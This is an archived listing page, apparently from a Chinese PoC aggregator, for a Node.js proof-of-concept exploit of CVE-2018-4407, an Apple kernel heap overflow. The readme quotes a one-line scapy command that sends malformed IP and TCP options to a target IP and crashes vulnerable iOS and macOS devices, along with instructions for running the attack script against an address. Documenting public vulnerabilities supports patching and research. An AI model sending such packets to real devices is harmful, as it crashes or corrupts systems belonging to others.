CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

Source

https://github.com/SamDecrock/node-cve-2018-4407

Associated Vulnerability

Title:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:Apple macOS High Sierra等都是美国苹果（Apple）公司的一套专为Mac计算机所开发的专用操作系统。 Apple macOS Sierra 10.12.6版本和macOS High Sierra 10.13.6版本中的Kernel组件存在安全漏洞。攻击者可利用该漏洞执行任意代码（内存损坏）。

Description

Node.js PoC exploit code for CVE-2018-4407

Readme

# node-cve-2018-4407

Node.js PoC exploit code for CVE-2018-4407

Author: Sam Decrock

This script is based on the scapy script provided by Zuk:

<blockquote class="twitter-tweet" data-lang="en"><p lang="en" dir="ltr">iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:<br>pip install scapy<br>sudo scapy <br>send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1&quot;*18),(19, “2”*18)]))</p>&mdash; Zuk (@ihackbanme) <a href="https://twitter.com/ihackbanme/status/1057811965945376768?ref_src=twsrc%5Etfw">November 1, 2018</a></blockquote>

It crashes devices with iOS 11 or earlier as well as some versions of OS X.


## Install modules

To install its required modules, run:

	npm install

## Run

To run, pass the target IP address as an argument:

	node attack.js 192.168.1.20

## More information

Original write-up by Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407

File Snapshot


 [4.0K]  /data/pocs/27534df40b55149ad37e328ab8f2cc7501ae9548
├── [3.3K]  attack.js
├── [1.0K]  LICENSE
├── [ 553]  package.json
└── [ 965]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!